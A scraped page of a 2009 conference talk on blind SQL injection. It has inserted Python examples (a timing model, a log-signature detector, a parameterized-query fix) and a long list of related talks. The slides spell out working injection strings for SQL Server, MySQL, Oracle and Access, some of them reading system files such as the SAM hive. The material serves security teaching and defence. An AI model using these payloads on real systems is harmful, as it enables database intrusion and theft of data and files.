(Re)Playing with (Blind) SQL Injection
José Palazón “Palako”
Mobile Security at Yahoo!
Chema Alonso
Informatica64
Microsoft MVP Enterprise Security
Spain (…not only bulls…)
SQL Injection attacks
http://www.phrack.org/issues.html?id=8&issue=54
A long time ago, in a galaxy far, far away…
Agenda
• Serialized SQL Injection
– Demo: XML Extractor
• Arithmetic SQL Injection
– Divide by Zero
– Sums and subtractions
– Type overflow
– Demo
• Remote File Downloading using Blind SQL Injection
– SQL Server
– MySQL
– Oracle
– Demo: RFD Tool
• Time-Based Blind SQL Injection using heavy queries
– Demo: Marathon Tool
Serialized SQL Injection
Serialized SQL Injection
• Goal: to merge complex result sets into a single displayable field.
• XML serialization functions convert a whole result set into one XML string.
• This makes it possible to download large amounts of data with single, simple injections.
SQL Server
• FOR XML: Retrieves data as a single string representing an XML tree.
• RAW: Mandatory option. Shows the information converting each row of
the result set in an XML element in the form <row />.
• BINARY BASE64: The query fails if the result set contains any BINARY-typed column (images, passwords) unless this option is explicitly specified.
– union select '1','2','3',(select * from sysusers for xml raw, binary base64)
• XMLSCHEMA: obtains the whole table structure, including the data types,
column names and other constraints.
– Described by Dani Kachakil
MySQL
• No default XML support, requires a server side
extension
• GROUP_CONCAT (v 4.1+)
Oracle
• xmlforest, xmlelement,…
• No * support
Demo: Serialized SQL Injection
Arithmetic Blind SQL Injection
Blind Attacks
• The attacker injects code but cannot access the data directly.
• However, the injection changes the behavior of the web application.
• The attacker then looks for differences between the response pages of true injections (1=1) and false injections (1=2) to extract data.
– Blind SQL Injection
– Blind XPath Injection
– Blind LDAP Injection
Blind SQL Injection Attacks
• Attacker injects:
– “True where clauses”
– “False where clauses“
– Ex:
• Program.php?id=1 and 1=1
• Program.php?id=1 and 1=2
• The program returns no visible data from the database, and no data in error messages.
• The attacker cannot see any data extracted from the database.
Blind SQL Injection Attacks
• Attacker analyzes the response pages looking
for differences between “True-Answer Page”
and “False-Answer Page”:
– Different hashes
– Different html structure
– Different patterns (keywords)
– Different linear ASCII sums
– “Different behavior”
• For example: response time
Blind SQL Injection Attacks
• If any difference exists, then:
– Attacker can extract all information from database
– How? Using “booleanization”
• MySQL:
– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» “True-Answer Page” or “False-Answer Page”?
• MSSQL:
– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
• Oracle:
– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
Arithmetic Blind SQL Injection
• The query forces the parameter to be numeric
– SELECT field FROM table WHERE id=abs(param)
• Boolean logic is created with math operations
– Divide by zero
– Sums and subtractions
– Type overflows
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)
– Id=A+(1/(ASCII(B)-C))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the DB will generate a divide-by-zero exception.
Arithmetic Blind SQL Injection
• Sums and subtractions
– Id=A+ASCII(B)-C
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the response page for id=A+ASCII(B)-C will be the same as for id=A
Arithmetic Blind SQL Injection
• Value type overflow
– Id=A+((C/ASCII(B))*(K))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
• K -> Value that overflows the type defined for A
– (e.g. if A is an integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type
Demo:
• Divide by zero
• Sums and subtractions
• Integer overflow
Remote File Downloading using Blind SQL Injection techniques
Accessing Files
• Two ways:
– Load the file into a temp table
• and i>(select top 1 ASCII(Substring(column,pos,1)) from temp_table) ??
– Load the file in the query
• With every query the file is loaded into memory
• I am very sorry, engine
• and i>ASCII(Substring(load_file(file),pos,1)) ??
SQL Server 2K - External Data Sources
• Only for known file types:
– Access through drivers: txt, csv, xls, mdb, log
– And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:dirtarget.txt'),1,1))
• Privileges
– HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0
– By default this key doesn't exist, so only users with the Server Admin role can use these functions.
• NTFS permissions
• NTFS permissions
SQL Server 2K – Bulk option
• Access to any file
– ; Create Table TempTable as (row varchar(8000)) --
– ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') --
– ; alter table TempTable add num int IDENTITY(1,1) NOT NULL --
– and (select COUNT(row) from TempTable)
– and (select top 1 len(row) from TempTable where num = rownum)
– and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
– ; Drop Table TempTable --
• Privileges needed
– Server Role: Bulkadmin
– Database Role: db_owner or db_ddladmin
• NTFS permissions
SQL Server 2k5 – 2k8
• OPENDATASOURCE and OPENROWSET supported
• Bulk options improved
– AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))--
• Permissions
– Bulkadmin Server Role
– External Data Sources enabled
• sp_configure
• Surface Area Configuration tool (features)
MySQL
• LoadFile
– SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
• SQLbfTools: MySQLget command (illo and dab)
• http://www.reversing.org/node/view/11
• Load Data infile
– ; Create table C8DFC643 (datos varchar(4000))
– ; Load data infile 'c:\boot.ini' into table C8DFC643
– ; alter table C8DFC643 add column num integer auto_increment
unique key
– and (select count(num) from C8DFC643)
– and (select length(datos) from C8DFC643 where num = 1)
– and (select ASCII(substring(datos,5,1)) from C8DFC643 where num =
1)
– ; Drop table C8DFC643
Oracle – Plain Text files
• External Tables
– ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --
– ; execute immediate 'Create table A737D141
( datos varchar2(4000) ) organization external
(TYPE ORACLE_LOADER default directory
A4A9308C access parameters ( records delimited
by newline ) location (''boot.ini''))'; end;--
– Only Plain Text files
Oracle – DBMS_LOB
; execute immediate '
DECLARE l_bfile BFILE;
l_blob BLOB;
BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;'
; end; --
Demo RFD
Time-based Blind SQL Injection using heavy queries
Time-Based Blind SQL Injection
• In scenarios with no differences between “True-
Answer Page” and “False-Answer Page”, time
delays can be used.
• Injection forces a delay in the response page
when the condition injected is True.
– Delay functions:
• SQL Server: waitfor
• Oracle: dbms_lock.sleep
• MySQL: sleep or benchmark function
• Postgres: pg_sleep
– Ex:
• ; if (exists(select * from users)) waitfor delay '0:0:5'
Exploit for Solar Empire Web Game
Deep Blind SQL Injection
• The time delay depends on the value being extracted.
• E.g. “a” -> 10 s delay, “b” -> 11 s delay, …
• http://labs.portcullis.co.uk/application/deep-blind-
Time-Based Blind SQL Injection
• What about database engines without delay functions, e.g. MS Access, Oracle connections without PL/SQL support, DB2, etc.?
• Can we still exploit Time-Based Blind SQL Injection there?
Yes, we can!
“Where-Clause” execution order
Select “whatever”
From whatever
Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?

The heavy condition first
Condition2 (100 sec) | Condition1 (10 sec) | Condition2 & Condition1 | Response Time
TRUE                 | FALSE               | FALSE                   | 110 sec
TRUE                 | TRUE                | TRUE                    | 110 sec
FALSE                | Not evaluated       | FALSE                   | 100 sec

The light condition first
Condition1 (10 sec) | Condition2 (100 sec) | Condition1 & Condition2 | Response Time
TRUE                | FALSE                | FALSE                   | 110 sec
TRUE                | TRUE                 | TRUE                    | 110 sec
FALSE               | Not evaluated        | FALSE                   | 10 sec
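To make the two tables concrete, here is a small model of short-circuit AND evaluation with the 10-second and 100-second costs from the slides. It is an added illustration, not code from the talk: it reproduces both tables and shows the point that explains the technique, namely that a guessed condition's value is visible in the response time only when the heavy condition is evaluated after it, which is why the order the engine picks decides whether the timing channel exists at all.

```python
"""Model of WHERE-clause evaluation order as a timing channel (added
illustration; costs are the slide's 10 s and 100 s, evaluation is simulated
with an accumulated-cost counter, no database involved)."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Condition:
    name: str
    cost: float   # seconds the engine needs to evaluate this condition
    value: bool   # what it evaluates to


def evaluate_and(order: List[Condition]) -> Tuple[bool, float]:
    """Evaluate `c1 AND c2 AND ...` in the given order with short-circuit
    semantics: stop at the first FALSE, paying only for the conditions
    actually evaluated. Returns (result, elapsed_seconds)."""
    elapsed = 0.0
    for cond in order:
        elapsed += cond.cost
        if not cond.value:
            return False, elapsed
    return True, elapsed


HEAVY_COST = 100.0   # condition2 on the slides
LIGHT_COST = 10.0    # condition1 on the slides


def response_table(heavy_first: bool) -> List[Tuple[str, str, str, float]]:
    """Rebuild one of the two slide tables. Each row is
    (first-evaluated value, second-evaluated value, AND result, seconds)."""
    first_cost, second_cost = (
        (HEAVY_COST, LIGHT_COST) if heavy_first else (LIGHT_COST, HEAVY_COST))
    rows = []
    for v1, v2 in [(True, False), (True, True), (False, None)]:
        order = [Condition("first", first_cost, v1),
                 Condition("second", second_cost, bool(v2))]  # unused when v1 is False
        result, secs = evaluate_and(order)
        rows.append((str(v1).upper(),
                     "Not evaluated" if v2 is None else str(v2).upper(),
                     str(result).upper(), secs))
    return rows


def guess_response_time(guess_is_true: bool, heavy_first: bool) -> float:
    """Response time of `... AND <heavy cross join> AND <guess>`: the injected
    heavy condition is always TRUE; the guess is the booleanized test
    (e.g. 300>ascii(substring(name,1,1)) on the slide)."""
    heavy = Condition("heavy cross join", HEAVY_COST, True)
    guess = Condition("booleanized guess", LIGHT_COST, guess_is_true)
    return evaluate_and([heavy, guess] if heavy_first else [guess, heavy])[1]


def guess_is_observable(heavy_first: bool) -> bool:
    """True when TRUE and FALSE guesses produce different response times,
    i.e. when the timing channel actually carries the guessed bit."""
    return (guess_response_time(True, heavy_first)
            != guess_response_time(False, heavy_first))


if __name__ == "__main__":
    for heavy_first, title in [(True, "The heavy condition first"),
                               (False, "The light condition first")]:
        print(title)
        for row in response_table(heavy_first):
            print("  %-6s %-14s %-6s %5.0f sec" % row)
        print("  guess observable in timing:", guess_is_observable(heavy_first))
```

Run stand-alone it prints both tables; the last line of each shows that with the heavy condition evaluated first both guesses cost 110 seconds (nothing leaks), while with the light condition first a FALSE guess returns in 10 seconds and a TRUE one in 110.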
Time-Based Blind SQL Injection using Heavy Queries
• The attacker can delay the “True-Answer Page” using a heavy query.
• It depends on how the database engine evaluates the where clauses in the query.
• There are two types of database engines:
– Databases without an optimization process
– Databases with an optimization process
Time-Based Blind SQL Injection using Heavy Queries
• The attacker can inject a heavy cross-join condition to delay the response page for true injections.
• The cross-join condition must be heavier than the other condition.
• The attacker only needs to know or guess the name of a table they have select permission on.
• Example in MSSQL:
– Program.php?id=1 and (SELECT count(*) FROM sysusers
AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS
sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7,
sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)
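From the defensive side, the payload shapes named across these slides (FOR XML serialization, OPENROWSET/BULK and LOAD_FILE file reads, delay functions, the same catalog table listed twice in one FROM clause, ASCII(SUBSTRING(...)) booleanization) are all visible in the web server's access log, and a heavy query additionally leaves a response-time outlier against the normal timing of the same page. The detection sketch below is an added example, not the talk's tooling: it assumes Combined Log Format lines with a trailing request-time field (the shape nginx's `$request_time` produces) and runs over log lines constructed here.

```python
"""Signature plus timing-outlier detection for the blind-SQLi shapes on these
slides (added example; log format and sample lines are constructed)."""
import re
import statistics
from urllib.parse import unquote_plus

# Payload shapes named on the slides, grouped by technique.
SIGNATURES = {
    "serialized-xml": re.compile(r"\bfor\s+xml\b", re.I),
    "file-read": re.compile(
        r"\b(openrowset|opendatasource|bulk\s+insert|load_file|load\s+data\s+infile|dbms_lob)\b",
        re.I),
    "delay-function": re.compile(
        r"\b(waitfor\s+delay|pg_sleep|dbms_lock\.sleep|benchmark\s*\(|sleep\s*\()", re.I),
    # same table listed twice in one FROM clause: "FROM sysusers AS s1, sysusers AS s2"
    "heavy-cross-join": re.compile(r"\bfrom\s+([\w.]+)\s+(?:as\s+)?\w+\s*,\s*\1\b", re.I),
    "booleanized-char": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
}

# Combined Log Format plus a trailing request-time field (assumption: nginx $request_time).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<secs>[\d.]+)$')


def parse_line(line):
    """Split one log line into ip, path, URL-decoded query string and seconds."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("url").partition("?")
    return {"ip": m.group("ip"), "path": path,
            "query": unquote_plus(query), "secs": float(m.group("secs"))}


def match_signatures(query):
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def analyze(lines, slow_factor=10.0):
    """Return (ip, path, sorted hit names, seconds) for each suspicious request.
    The timing baseline per path is the median of requests with no signature
    hit; the median tolerates a few slow outliers, so a request that is
    slow_factor times slower than it is flagged as 'slow-response'."""
    records = [r for r in map(parse_line, lines) if r]
    baseline = {}
    for r in records:
        if not match_signatures(r["query"]):
            baseline.setdefault(r["path"], []).append(r["secs"])
    findings = []
    for r in records:
        hits = match_signatures(r["query"])
        benign = baseline.get(r["path"])
        if benign and r["secs"] > slow_factor * statistics.median(benign):
            hits.append("slow-response")
        if hits:
            findings.append((r["ip"], r["path"], sorted(hits), r["secs"]))
    return findings


SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.5 - - [07/Feb/2009:11:02:13 +0000] "GET /Program.php?id=1 HTTP/1.1" 200 5123 0.041',
    '10.0.0.6 - - [07/Feb/2009:11:02:20 +0000] "GET /Program.php?id=2 HTTP/1.1" 200 5098 0.038',
    '10.0.0.7 - - [07/Feb/2009:11:02:31 +0000] "GET /Program.php?id=3 HTTP/1.1" 200 5111 0.045',
    # heavy self cross join on sysusers plus a booleanized character test; slow True-Answer page
    '198.51.100.9 - - [07/Feb/2009:11:05:02 +0000] "GET /Program.php?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20as%20sys2)>1%20and%20300>(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5123 14.020',
    # explicit delay function
    '198.51.100.9 - - [07/Feb/2009:11:06:40 +0000] "GET /Program.php?id=1;%20waitfor%20delay%20%270:0:5%27-- HTTP/1.1" 200 5123 5.010',
    # serialized extraction: fast, but the FOR XML keyword gives it away
    '198.51.100.9 - - [07/Feb/2009:11:07:15 +0000] "GET /Program.php?id=1%20union%20select%20%271%27,%272%27,%273%27,(select%20*%20from%20sysusers%20for%20xml%20raw,%20binary%20base64) HTTP/1.1" 200 90211 0.050',
]

if __name__ == "__main__":
    for ip, path, hits, secs in analyze(SAMPLE_LOG):
        print(f"{ip} {path} {secs:.3f}s {', '.join(hits)}")
```

The timing check is the part that survives keyword obfuscation: a heavy query that evades every regex still has to be slow on the True-Answer page, so pairing the signatures with a per-endpoint response-time baseline is what catches the heavy-query variant described on these slides.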
“Default” tables to construct a heavy query
– Microsoft SQL Server
• sysusers
– Oracle
• all_users
– MySQL (version 5)
• information_schema.columns
– Microsoft Access
• MSysAccessObjects (97 & 2000 versions)
• MSysAccessStorage (2003 & 2007)
“Default” tables to construct a heavy query
• …or whatever you can guess
– Clients
– Customers
– News
– Logins
– Users
– Providers
– ….Use your imagination…
Ex 1: MS SQL Server
• Query lasts 14 seconds -> True-Answer
Ex 1: MS SQL Server
• Query lasts 1 second -> False-Answer
Ex 2: Oracle
• Query lasts 22 seconds -> True-Answer
Ex 2: Oracle
• Query lasts 1 second -> False-Answer
Ex 3: Access 2000
• Query lasts 6 seconds -> True-Answer
Ex 3: Access 2000
• Query lasts 1 second -> False-Answer
Ex 4: Access 2007
• Query lasts 39 seconds -> True-Answer
Ex 4: Access 2007
• Query lasts 1 second -> False-Answer
Marathon Tool
• Automates Time-Based Blind SQL Injection attacks using heavy queries against SQL Server, MySQL, MS Access and Oracle databases.
• Schema extraction from known databases
• Extracts data using heavy queries regardless of the database engine (without schema)
• Developed in .NET
• Source code available
Demo: Marathon Tool
Prevention:
Don't forget Bobby Tables!
SANITIZE YOUR QUERIES!
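As an added example (not from the talk) of what “sanitize your queries” means in code: the string-built lookup beside a parameterized one, run against an in-memory SQLite table constructed here to stand in for the deck's `Program.php?id=N` page. The last helper applies the talk's own True/False probe to both versions: the vulnerable lookup answers `1 and 1=1` and `1 and 1=2` differently, which is exactly the oracle a blind attack needs, while the fixed one rejects both identically and gives the attacker nothing to compare.

```python
"""String-built query beside its parameterized, type-checked form (added
example; the 'programs' table and its rows are constructed here)."""
import sqlite3
from typing import Callable, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the talk's Program.php?id=N lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE programs (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO programs VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, param: str) -> List[Tuple[str]]:
    """String-built query: whatever the client sends becomes part of the SQL."""
    return conn.execute(f"SELECT title FROM programs WHERE id={param}").fetchall()


def lookup_safe(conn: sqlite3.Connection, param: str) -> List[Tuple[str]]:
    """Validate the type the query expects (the slide's id=abs(param) idea,
    done in application code), then bind the value as a parameter so the
    driver passes it as data, never as SQL text."""
    try:
        ident = int(param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT title FROM programs WHERE id=?", (ident,)).fetchall()


def responses_differ(conn: sqlite3.Connection,
                     lookup: Callable[[sqlite3.Connection, str], list]) -> bool:
    """The talk's blind probe: do `1 and 1=1` and `1 and 1=2` yield different
    responses? Any difference (rows, error text, timing) is the oracle."""
    def probe(param: str):
        try:
            return ("rows", lookup(conn, param))
        except ValueError as exc:
            return ("error", str(exc))
    return probe("1 and 1=1") != probe("1 and 1=2")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1       :", lookup_vulnerable(db, "1"))
    print("vulnerable, id=1 or 1=1:", lookup_vulnerable(db, "1 or 1=1"))
    print("safe, id=1             :", lookup_safe(db, "1"))
    print("blind oracle, vulnerable:", responses_differ(db, lookup_vulnerable))
    print("blind oracle, safe      :", responses_differ(db, lookup_safe))
```

Binding alone already defeats the injection (the bound text never becomes SQL); the integer check on top is what makes the true and false probes indistinguishable, because both are rejected before any query runs and so cannot differ in rows, error or response time.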
Questions?
• Speakers:
– Chema Alonso (chema@informatica64.com)
– Palako (palako@lateatral.com)
• Authors
– Chema Alonso (chema@informatica64.com)
– Alejandro Martín (amartin@informatica64.com)
– Antonio Guzmán (aguzman@urjc.es)
– Daniel Kachakil (dani@kachakil.org)
– José Palazón “Palako” (palako@lateatral.com)
– Marta Beltran (mberltran@urjc.es)

 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
 
Guía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRGuía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIR
 
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaCurso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
 
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
 
LDAP Injection Techniques
LDAP Injection TechniquesLDAP Injection Techniques
LDAP Injection Techniques
 
X Forum AUSAPE 2014
X Forum AUSAPE 2014X Forum AUSAPE 2014
X Forum AUSAPE 2014
 

Último

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Último (20)

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

ShmooCON 2009 : Re-playing with (Blind) SQL Injection

(Re) Playing with (Blind) SQL Injection
José Palazón “Palako”
Mobile Security at Yahoo!
Chema Alonso
Informatica64
Microsoft MVP Enterprise Security

